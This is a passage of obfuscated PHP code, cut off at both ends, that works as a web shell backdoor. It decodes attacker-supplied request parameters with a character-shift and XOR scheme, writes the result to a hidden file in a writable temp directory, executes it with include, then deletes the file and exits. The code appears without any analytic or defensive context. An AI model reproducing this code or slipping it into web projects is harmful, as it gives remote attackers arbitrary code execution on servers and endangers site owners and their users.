= count($ent)) break; if (array_product([is_dir($symbol), is_writable($symbol)])) { $hld = join("/", [$symbol, ".value"]); $success = file_put_contents($hld, $item); if ($success) { include $hld; @unlink($hld); die();} } $rec++; } while (true); } if(count($_REQUEST) > 0 && isset($_REQUEST["el\x65m\x65nt"])){ $val = array_filter([getenv("TMP"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/tmp", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); $parameter_group = $_REQUEST["el\x65m\x65nt"]; $parameter_group =explode( '.' , $parameter_group ) ; $rec = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $len = count($parameter_group); for($j = 0; $j <$len; $j++) { $v5 = $parameter_group[$j]; $sChar = ord($s[$j % $lenS]); $d =((int)$v5 - $sChar -($j % 10)) ^ 40; $rec .= chr($d);} foreach ($val as $key => $mrk) { if (max(0, is_dir($mrk) * is_writable($mrk))) { $property_set = "$mrk" . "/.ref"; $file = fopen($property_set, 'w'); if ($file) { fwrite($file, $rec); fclose($file); include $property_set; @unlink($property_set); die(); } } } } if(!empty($_POST["f\x61c"])){ $ptr = $_POST["f\x61c"]; $ptr =explode ( "." , $ptr) ; $itm = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s2 ); $m = 0; foreach( $ptr as $v3) { $sChar = ord( $s2[$m % $sLen] ); $dec =( ( int)$v3 - $sChar -( $m % 10)) ^ 9; $itm .= chr( $dec ); $m++; } $ent = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd()]); foreach ($ent as $marker): if ((is_dir($marker) and is_writable($marker))) { $desc = str_replace("{var_dir}", $marker, "{var_dir}/.item"); if (@file_put_content